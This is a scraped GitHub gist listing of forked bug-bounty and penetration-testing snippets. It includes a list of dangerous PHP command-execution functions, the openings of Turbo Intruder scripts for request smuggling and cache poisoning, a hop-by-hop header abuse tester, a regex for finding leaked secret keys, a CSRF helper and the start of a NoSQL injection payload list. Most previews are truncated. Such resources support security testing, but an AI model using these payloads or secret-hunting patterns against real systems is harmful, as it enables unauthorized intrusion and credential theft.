exec - Returns last line of commands output
passthru - Passes commands output directly to the browser
system - Passes commands output directly to the browser and returns last line
shell_exec - Returns commands output
\`\` (backticks) - Same as shell_exec()
popen - Opens read or write pipe to process of a command
proc_open - Similar to popen() but greater degree of control
pcntl_exec - Executes a program
srand2
/ phpdangerousfuncs.md
Created
October 30, 2022 18:04
— forked from mccabe615/phpdangerousfuncs.md
Dangerous PHP Functions
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
srand2
/ turbointruder-404.py
Created
December 11, 2022 08:12
— forked from DanielIntruder/turbointruder-404.py
A Turbo Intruder script for confirming CL.CL request smuggling
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # if you edit this file, ensure you keep the line endings as CRLF or you'll have a bad time | |
| def queueRequests(target, wordlists): | |
| # to use Burp's HTTP stack for upstream proxy rules etc, use engine=Engine.BURP | |
| engine = RequestEngine(endpoint=target.endpoint, | |
| concurrentConnections=5, | |
| requestsPerConnection=1, # if you increase this from 1, you may get false positives | |
| resumeSSL=False, | |
| timeout=10, | |
| pipeline=False, |
srand2
/ turbointruder-cachepoisoning.py
Created
December 11, 2022 08:12
— forked from DanielIntruder/turbointruder-cachepoisoning.py
A script to exploit cache poisoning using CL.CL request smuggling
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # if you edit this file, ensure you keep the line endings as CRLF or you'll have a bad time | |
| def queueRequests(target, wordlists): | |
| # to use Burp's HTTP stack for upstream proxy rules etc, use engine=Engine.BURP | |
| engine = RequestEngine(endpoint=target.endpoint, | |
| concurrentConnections=5, | |
| requestsPerConnection=1, # if you increase this from 1, you may get false positives | |
| resumeSSL=False, | |
| timeout=10, | |
| pipeline=False, |
srand2
/ hbh-header-abuse-test.py
Created
December 28, 2022 04:30
— forked from ndavison/hbh-header-abuse-test.py
Attempts to find hop-by-hop header abuse potential against the provided URL.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # github.com/ndavison | |
| import requests | |
| import random | |
| import string | |
| from argparse import ArgumentParser | |
| parser = ArgumentParser(description="Attempts to find hop-by-hop header abuse potential against the provided URL.") | |
| parser.add_argument("-u", "--url", help="URL to target (without query string)") |
srand2
/ Generic keys
Created
January 1, 2023 09:20
— forked from h4x0r-dz/Generic keys
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| (?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_k |
srand2
/ customcsrf.py
Created
January 5, 2023 15:36
— forked from fransr/customcsrf.py
Hackvertor Custom CSRF tag
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import httplib | |
| import urllib | |
| http = httplib.HTTPSConnection('example.com', 443) | |
| cookie = 'your=cookies'; | |
| http.request("GET", "/api/v1/csrf", "", { | |
| 'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36', | |
| 'referer': 'https://example.com/', |
srand2
/ bbprograms.txt
Created
January 16, 2023 08:31
— forked from arbazkiraak/bbprograms.txt
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| google dork -> site:.co.uk inurl:"responsible disclosure" | |
| https://registry.internetnz.nz/about/vulnerability-disclosure-policy/ | |
| http://www.123contactform.com/security-acknowledgements.htm | |
| https://18f.gsa.gov/vulnerability-disclosure-policy/ | |
| https://support.1password.com/security-assessments/ | |
| https://www.23andme.com/security-report/ | |
| https://www.abnamro.com/en/footer/responsible-disclosure.html | |
| https://www.accenture.com/us-en/company-accenture-responsible-disclosure | |
| https://www.accredible.com/white_hat/ | |
| https://www.acquia.com/how-report-security-issue |
srand2
/ nosql-injection-payloads-for-postman.json
Created
March 13, 2023 08:53
— forked from DanaEpp/nosql-injection-payloads-for-postman.json
NoSQL injection payloads for Postman
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [ | |
| {"payload":"'"}, | |
| {"payload":"''"}, | |
| {"payload":";%00"}, | |
| {"payload":"--"}, | |
| {"payload":"-- -"}, | |
| {"payload":"\"\""}, | |
| {"payload":";"}, | |
| {"payload":"' OR '1"}, | |
| {"payload":"' OR 1 -- -"}, |